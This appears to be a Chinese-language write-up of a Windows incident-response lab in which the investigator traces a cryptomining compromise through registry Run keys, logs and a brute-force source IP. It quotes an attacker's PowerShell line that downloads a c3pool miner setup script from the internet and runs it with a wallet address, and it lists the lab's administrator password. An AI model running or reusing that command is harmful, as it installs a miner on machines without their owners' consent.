跳到主要内容

挖矿事件

信息

前景需要:机房运维小陈,下班后发现还有工作没完成,然后上机器越用越卡,请你帮他看看原因。

挑战题解:

攻击者的IP地址

攻击者开始攻击的时间

攻击者攻击的端口

挖矿程序的md

后门脚本的md5

矿池地址

钱包地址

相关账户密码:

Administrator/zgsf@123

rdp连接上机器

首先打开windows管理工具

image-20241029214759167

然后就查看,有没有后门账户,有没有计划任务,查看日志,查看注册表

shell:startup

image-20241029214958499

查看自启动任务

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

image-20241029215303186

存在一个批处理文件,部分内容如下:

$wc.DownloadFile('https://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y;

发现挖矿域名地址c3pool.org

钱包地址:4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y

image-20241029215847206

同时,火绒剑也发现

image-20241029215707895

LogParser.exe日志分析

上传windows一键日志分析工具

image-20241029215939466

发现存在爆破记录

ip为192.168.115.131,时间:2024-05-21 20:25:22

发现可疑文件

image-20241029220200980

那么这个就是xmrig.exe挖矿程序

已知条件,是一台运维的电脑,那么说明,不会去跑任何业务,打开桌面上的表格看看

image-20241029220502454

密码都是统一的,说明可能是攻击者在拿到一台的密码后进行的密码喷洒

总结

一开始电脑上没有进程,就是用工具进行分析,然后翻文件